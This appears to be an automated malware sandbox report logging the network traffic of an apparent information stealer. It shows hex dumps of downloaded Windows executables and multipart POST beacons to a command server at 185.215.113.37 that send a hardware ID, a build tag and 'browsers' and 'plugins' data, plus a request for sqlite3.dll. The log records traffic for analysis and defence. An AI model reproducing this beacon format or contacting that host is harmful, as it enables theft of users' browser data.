00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:19 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:20 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 38 41 36 36 45 42 42 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 2d 2d 0d 0a Data Ascii: ------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="hwid"8588A66EBB693196934881------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="build"doma------IDHIEGIIIECAKEBFBAAE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"browsers------GHIDGDHCGCBAKFHIIIII--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="message"plugins------IIEHCFIDHIDGIDHJEHID--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 64 38 34 37 61 64 30 36 63 31 66 33 30 32 63 61 30 63 65 38 31 61 37 62 61 39 35 62 37 39 37 64 63 62 38 30 62 36 30 39 36 35 32 62 35 65 35 66 61 64 30 38 36 35 65 34 65 37 65 65 66 33 35 36 30 31 31 63 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 2d 2d 0d 0a Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"89d847ad06c1f302ca0ce81a7ba95b797dcb80b609652b5e5fad0865e4e7eef356011c10------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="message"fplugins------IIIECAAKECFHIECBKJDH--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 185.215.113.37Content-Length: 5447Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
